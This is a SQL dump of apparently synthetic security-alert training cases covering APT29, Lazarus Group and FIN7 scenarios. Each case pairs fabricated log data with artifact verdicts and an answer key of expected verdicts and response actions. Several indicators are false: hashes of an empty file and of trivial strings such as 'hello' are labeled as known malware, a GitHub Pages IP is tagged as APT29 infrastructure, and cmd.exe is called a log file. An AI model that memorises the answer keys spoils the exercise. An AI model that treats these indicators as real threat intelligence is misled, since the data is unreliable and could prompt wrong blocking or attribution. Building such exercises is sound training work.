Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(559, 'C2 Communication via Domain Generation Algorithm', 'high', 'DNS Traffic Analysis', 'The DNS logs indicate that a compromised host is communicating with multiple dynamically generated domains. This activity is indicative of command and control operations using a domain generation algorithm (DGA) typically employed by advanced persistent threats such as APT29.', 'Command and Control', 'T1568.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-06T14:23:45Z\",\"source_ip\":\"10.0.1.15\",\"destination_domain\":\"hgytqwoein.com\",\"queried_domains\":[\"hgytqwoein.com\",\"sjdhgqjwev.com\",\"aslkdjqwope.com\"],\"resolver_ip\":\"8.8.8.8\",\"detected_algorithm\":\"DGA\",\"associated_hash\":\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\",\"user\":\"jsmith\",\"process\":\"dns.exe\",\"internal_ip\":\"10.0.1.15\",\"external_ip\":\"198.51.100.14\",\"threat_actor\":\"APT29\",\"malware\":\"CustomDGA\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.1.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in suspicious activity.\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"hgytqwoein.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Domain generated by a known DGA pattern used by APT29.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f4d2e1a7c8bdcc9efefdc1b5ab2d3f7\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT29\'s DGA malware.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"198.51.100.14\",\"is_critical\":false,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"suspicious\",\"details\":\"External IP associated with suspected command and control server.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(560, 'Credential Harvesting for Lateral Movement', 'high', 'Authentication Logs', 'APT29 utilizes harvested credentials to move laterally within the network, accessing sensitive systems and data.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T12:45:32Z\",\"event_id\":\"4624\",\"computer_name\":\"server-01.internal.local\",\"logon_type\":\"3\",\"subject\":{\"user_id\":\"S-1-5-21-3623811015-3361044348-30300820-1013\",\"account_name\":\"admin_user\",\"account_domain\":\"INTERNAL\"},\"network_information\":{\"source_ip\":\"192.168.1.25\",\"destination_ip\":\"10.0.0.15\"},\"additional_information\":{\"logon_process\":\"NtLmSsp\",\"authentication_package\":\"NTLM\",\"transmitted_services\":\"-\",\"lm_package_name\":\"-\"},\"threat_actor_ip\":\"185.199.108.153\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"APT29_tool.exe\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.199.108.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with APT29.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with APT29 credential harvesting tool.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"APT29_tool.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Threat Database\",\"verdict\":\"suspicious\",\"details\":\"Executable detected during lateral movement activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Internal admin account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL),
(561, 'Deployment of Second-Stage Payloads', 'high', 'Malware Analysis Reports', 'The attackers deployed second-stage payloads to enhance their intelligence-gathering capabilities and maintain control over compromised systems. This activity is associated with APT29, known for sophisticated supply chain attacks and spearphishing campaigns.', 'Execution', 'T1059', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:32:45Z\",\"event_id\":\"4624\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"malware_hash\":\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\",\"username\":\"j.doe\",\"filename\":\"payload_stage2.dll\",\"process_name\":\"svchost.exe\",\"command_line\":\"rundll32.exe payload_stage2.dll,EntryPoint\",\"event_description\":\"Second-stage payload executed on the host, enhancing attacker capabilities.\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted by second-stage payload.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2b5b9d4e5c7a8b9d5f6a7c8e9b2f3d4\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of APT29 second-stage payloads.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"payload_stage2.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Analysis\",\"verdict\":\"malicious\",\"details\":\"File used in second-stage malware deployment.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(562, 'Data Exfiltration via Stealth Channels', 'high', 'Outbound Traffic Monitoring', 'Detected data exfiltration attempt by APT29 using stealthy communication channels to transmit sensitive information from the internal network to an external server.', 'Exfiltration', 'T1020 - Automated Exfiltration', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:25:43Z\",\"source_ip\":\"10.0.5.23\",\"destination_ip\":\"185.199.110.153\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36\",\"file_name\":\"confidential_report_2023.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_id\":\"jdoe\",\"action\":\"File Upload\",\"url\":\"https://maliciousdomain.com/upload\",\"description\":\"Large data transfer detected from internal IP 10.0.5.23 to external IP 185.199.110.153 over HTTPS. File hash and size match known signatures for exfiltrated data.\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.5.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"185.199.110.153\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with APT29 operations\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with exfiltrated data by APT29\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"https://maliciousdomain.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"URL associated with data exfiltration activities\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"confidential_report_2023.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Filename suggests sensitive data\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(563, 'Covering Tracks and Cleanup', 'high', 'System Logs', 'APT29 engaged in advanced defense evasion techniques by cleaning up system logs, removing files, and altering timestamps to eradicate evidence of their intrusion. The activity was detected following unusual log deletions and file manipulations on the compromised host.', 'Defense Evasion', 'T1070.004 - File Deletion', 1, 'new', NULL, '{\"timestamp\":\"2023-10-10T14:22:05Z\",\"event_id\":\"4625\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.100\",\"username\":\"j.doe\",\"deleted_files\":[\"C:\\\\Windows\\\\Temp\\\\malicious_log.bak\",\"C:\\\\Users\\\\j.doe\\\\AppData\\\\Local\\\\Temp\\\\APT29_trace.txt\"],\"file_hash\":\"5d41402abc4b2a76b9719d911017c592\",\"action\":\"File Deletion\",\"log_source\":\"Windows Security\",\"message\":\"User j.doe executed file deletion commands to remove traces of unauthorized access.\"}', '2026-01-07 22:39:53', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT29 infrastructure.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Asset Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known malicious file used by APT29.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(564, 'Initial Access via Phishing', 'medium', 'Email Security Logs', 'Lazarus Group initiates the attack by deploying phishing emails to Sony employees, leading to network infiltration.', 'Phishing Attack', 'T1566.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-01T14:22:43Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"email_subject\":\"Urgent: Action Required for Sony Account Update\",\"email_from\":\"it-support@sonypictures.com\",\"email_to\":\"john.doe@sonypictures.com\",\"attachment\":\"update-instructions.pdf\",\"attachment_hash\":\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\",\"malicious_link\":\"http://malicious-update.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\"}', '2026-01-07 22:40:38', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of Sony Pictures network.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"it-support@sonypictures.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Spoofed email address used in phishing campaigns.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3d2c9c6e1f8b2c1ddf3f2c9e1b8c3d2c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known phishing PDF attachment.\"}},{\"id\":\"artifact_5\",\"type\":\"url\",\"value\":\"http://malicious-update.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Scan\",\"verdict\":\"malicious\",\"details\":\"URL used for credential harvesting.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(565, 'Execution of Destover Malware', 'high', 'Endpoint Detection and Response (EDR)', 'The attackers execute the \'Destover\' wiper malware, causing widespread system damage and data destruction.', 'Malware Deployment', 'T1485: Data Destruction', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:00Z\",\"event_id\":\"EDR-2023-1024\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.25\",\"malware_name\":\"Destover\",\"file_path\":\"C:\\\\Windows\\\\Temp\\\\destover_wiper.exe\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"process_id\":5678,\"action\":\"Malware Execution\",\"description\":\"Detected execution of Destover malware on endpoint.\"}', '2026-01-07 22:40:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Associated with known APT attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate endpoint.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Destover malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Employee account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(566, 'Establishing Persistence - Backdoor Installation', 'medium', 'Network Traffic Analysis', 'A backdoor associated with the Lazarus Group was detected on the network, indicating an attempt to establish persistence on the compromised system.', 'Backdoor Installation', 'T1059 - Command and Scripting Interpreter', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:07Z\",\"source_ip\":\"192.168.1.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":8080,\"protocol\":\"HTTP\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"uri\":\"/backdoor/installer.php\",\"method\":\"GET\",\"http_version\":\"1.1\",\"filename\":\"backdoor_installer.exe\",\"file_hash\":\"f2d4e2f7c2a2b5e1d4c3b2a1d5e2f4c3\",\"username\":\"jdoe\",\"action\":\"Download\",\"status\":\"200 OK\"}', '2026-01-07 22:40:38', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known Lazarus Group infrastructure.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2d4e2f7c2a2b5e1d4c3b2a1d5e2f4c3\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Analysis Report\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Lazarus Group backdoor installer.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"backdoor_installer.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection\",\"verdict\":\"malicious\",\"details\":\"File known to be used by Lazarus Group for persistence.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"suspicious\",\"details\":\"User account involved in suspicious download activity.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(567, 'Lateral Movement Within Network', 'high', 'Internal Server Logs', 'During step 4 of the operation, the Lazarus Group has moved laterally within the network, identifying critical systems for further exploitation. This activity was detected through internal server logs showing unauthorized access attempts and suspicious file transfers.', 'Internal Network Reconnaissance', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:45:23Z\",\"event_id\":\"4720\",\"source_ip\":\"10.1.2.3\",\"destination_ip\":\"192.168.10.5\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"network_admin\",\"action\":\"login_attempt\",\"result\":\"success\",\"file_transferred\":\"exploit_tool_v2.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"target_system\":\"192.168.10.5\",\"protocol\":\"SMB\",\"notes\":\"Possible use of stolen credentials to access sensitive systems.\"}', '2026-01-07 22:40:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.1.2.3\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network source IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Target system within network\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Known to be associated with Lazarus Group\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"exploit_tool_v2.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Unfamiliar executable transferred internally\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"external\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious tools\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(568, 'Data Exfiltration via Proxy Chains', 'high', 'Proxy Server Logs', 'Sensitive data, including unreleased films and executive emails, is exfiltrated using complex proxy chains to obfuscate the attack origin. This operation is linked to the Lazarus Group, known for using destructive malware and financial theft tactics.', 'Data Theft', 'T1048.002 - Exfiltration Over Alternative Protocol: Exfiltration Over Asymmetric Encrypted Non-C2 Pr', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:45Z\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.56\",\"proxy_chain\":[\"10.1.1.1\",\"172.16.0.5\",\"203.0.113.56\"],\"username\":\"jdoe\",\"file_exfiltrated\":\"executive_emails.zip\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\"}', '2026-01-07 22:40:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal host involved in exfiltration.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with data theft activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"virus_total\",\"verdict\":\"malicious\",\"details\":\"Hash associated with malicious data exfiltration tools.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"executive_emails.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal_filesystem\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file targeted for exfiltration.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"user_database\",\"verdict\":\"internal\",\"details\":\"Internal user account possibly compromised.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(569, 'Destruction of Evidence', 'medium', 'System Log Analysis', 'An attempt to delete system logs to erase traces of a cyberattack was detected. The action is suspected to be part of a cover-up strategy by the attackers to complicate forensic investigations.', 'Log Deletion', 'T1070.004 - Indicator Removal on Host: File Deletion', 1, 'new', NULL, '{\"timestamp\":\"2023-10-02T14:22:45Z\",\"eventID\":\"4625\",\"log_name\":\"Security\",\"message\":\"A deletion event was detected on the system logs located at C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx.\",\"user\":\"malicious_actor\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.10.12\",\"deleted_file\":\"C:\\\\Windows\\\\System32\\\\winevt\\\\Logs\\\\Security.evtx\",\"process_name\":\"cmd.exe\",\"hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-07 22:40:38', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with Lazarus Group activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.10.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Company internal IP.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"System Logs\",\"verdict\":\"suspicious\",\"details\":\"Critical system log file targeted for deletion.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with Lazarus Group\'s malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Beginner', 'NULL', 1, 0, NULL),
(570, 'Analysis of Geopolitical Motivations', 'high', 'Geopolitical Reports', 'This alert focuses on analyzing the geopolitical factors linking the recent cyber attack to North Korea\'s strategic goals and financial needs, specifically attributed to the Lazarus Group. The attack employed destructive malware and financial theft tactics.', 'Threat Intelligence Analysis', 'T1485: Data Destruction, T1589: Gather Victim Identity Information', 1, 'new', NULL, '{\"timestamp\":\"2023-10-20T14:23:35Z\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.10\",\"malware_hash\":\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\",\"malware_name\":\"WannaCry\",\"attacker_domain\":\"malicious-nk-group.com\",\"user\":\"jdoe\",\"filename\":\"ransomware_payload.exe\",\"action\":\"Data exfiltration attempt detected\",\"indicators\":[{\"indicator_type\":\"ip\",\"value\":\"203.0.113.45\",\"role\":\"attacker\"},{\"indicator_type\":\"hash\",\"value\":\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\",\"role\":\"malware\"}]}', '2026-01-07 22:40:38', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP address linked to North Korean threat actor group Lazarus\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"7d3f9a8c0b4a3eaccc3b6e6f1d5a5c7f\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with WannaCry ransomware\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"ransomware_payload.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Filename commonly used by ransomware\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL),
(571, 'Compromised HVAC Vendor Access', 'high', 'Firewall logs', 'FIN7 initiated an attack by exploiting a vulnerability in the HVAC vendor\'s network, providing an entry point into Target\'s infrastructure. The attack was detected through unusual traffic patterns in the firewall logs, originating from a known malicious IP associated with FIN7 operations.', 'Initial Access', 'T1199: Trusted Relationship', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:22:35Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"source_port\":443,\"destination_port\":8080,\"protocol\":\"TCP\",\"action\":\"allowed\",\"username\":\"hvac_vendor\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"file_name\":\"malicious_update.exe\",\"event_id\":\"FW-0002345678\",\"message\":\"Unusual traffic from trusted HVAC vendor IP\"}', '2026-01-08 22:01:14', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known FIN7 C2 server\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"HVAC vendor access point\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Identified as malware associated with FIN7\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_update.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Filename known to be used by FIN7\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"hvac_vendor\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"clean\",\"details\":\"Recognized vendor 